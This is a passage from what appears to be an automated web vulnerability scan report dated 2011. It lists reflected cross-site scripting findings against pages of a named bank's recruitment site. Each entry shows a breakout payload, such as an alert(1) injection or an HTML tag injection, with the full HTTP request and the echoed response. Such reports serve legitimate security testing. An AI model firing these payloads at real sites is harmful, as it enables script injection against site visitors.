Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_forums.php?73a48"><a>722a78de38f=1" />
...[SNIP]...

1.72. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41565"-alert(1)-"505a6724661 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_partnerships.php?41565"-alert(1)-"505a6724661=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:33 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:33 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
ent Group";
var SharingBaseTitle = "Partnerships - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_partnerships.php?41565"-alert(1)-"505a6724661=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.73. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81a"><a>6ddcb53c0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_partnerships.php?6e81a"><a>6ddcb53c0b4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:09 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:09 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_partnerships.php?6e81a"><a>6ddcb53c0b4=1" />
...[SNIP]...

1.74. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d90"-alert(1)-"0dc7d4973a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_key_figures.php?19d90"-alert(1)-"0dc7d4973a2=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_key_figures.php?19d90"-alert(1)-"0dc7d4973a2=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.75. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e69"><a>bd60c1b6951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_key_figures.php?25e69"><a>bd60c1b6951=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_key_figures.php?25e69"><a>bd60c1b6951=1" />
...[SNIP]...

1.76. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfd7"><a>6347bfd3728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_video_room.php?2cfd7"><a>6347bfd3728=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_video_room.php?2cfd7"><a>6347bfd3728=1" />
...[SNIP]...

1.77. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e22"-alert(1)-"fe05a195088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_video_room.php?76e22"-alert(1)-"fe05a195088=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
it Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_video_room.php?76e22"-alert(1)-"fe05a195088=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.78. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3fd"><a>b137c964413 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_vie.php?5c3fd"><a>b137c964413=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:10 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:10 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - G
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_vie.php?5c3fd"><a>b137c964413=1" />
...[SNIP]...

1.79. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13bb3"-alert(1)-"a425af1b629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_vie.php?13bb3"-alert(1)-"a425af1b629=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:33 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:33 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - G
...[SNIP]...
duates - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "VIE - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_vie.php?13bb3"-alert(1)-"a425af1b629=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.80. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1049"><a>72104ee9def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy.php?a1049"><a>72104ee9def=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>HR Poli
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy.php?a1049"><a>72104ee9def=1" />
...[SNIP]...

1.81. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b7d"-alert(1)-"1ffd64fe761 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy.php?d8b7d"-alert(1)-"1ffd64fe761=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:59 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:59 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>HR Poli
...[SNIP]...
= "HR Policy - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy.php?d8b7d"-alert(1)-"1ffd64fe761=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.82. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_benefit_resp.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1018f"><a>2c05120bb25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_benefit_resp.php?1018f"><a>2c05120bb25=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:44 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:44 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Social
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_benefit_resp.php?1018f"><a>2c05120bb25=1" />
...[SNIP]...

1.83. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_benefit_resp.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66714"-alert(1)-"aba8f03e0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_benefit_resp.php?66714"-alert(1)-"aba8f03e0e5=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:10 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:10 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Social
...[SNIP]...
aseTitle = "Social responsibility - Employee benefit programs - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_benefit_resp.php?66714"-alert(1)-"aba8f03e0e5=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.84. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_career.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd924"-alert(1)-"fac8db36bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_career.php?cd924"-alert(1)-"fac8db36bea=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:04 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:04 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Career
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Career development - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_career.php?cd924"-alert(1)-"fac8db36bea=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.85. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_career.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bbc"><a>e06e8b89cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_career.php?64bbc"><a>e06e8b89cd4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Career
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_career.php?64bbc"><a>e06e8b89cd4=1" />
...[SNIP]...

1.86. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_personal.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18ca"><a>d9d791c5f71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_personal.php?a18ca"><a>d9d791c5f71=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Persona
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_personal.php?a18ca"><a>d9d791c5f71=1" />
...[SNIP]...

1.87. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_personal.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84fa"-alert(1)-"49fbafa66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_personal.php?b84fa"-alert(1)-"49fbafa66=1 HTTP/1.1
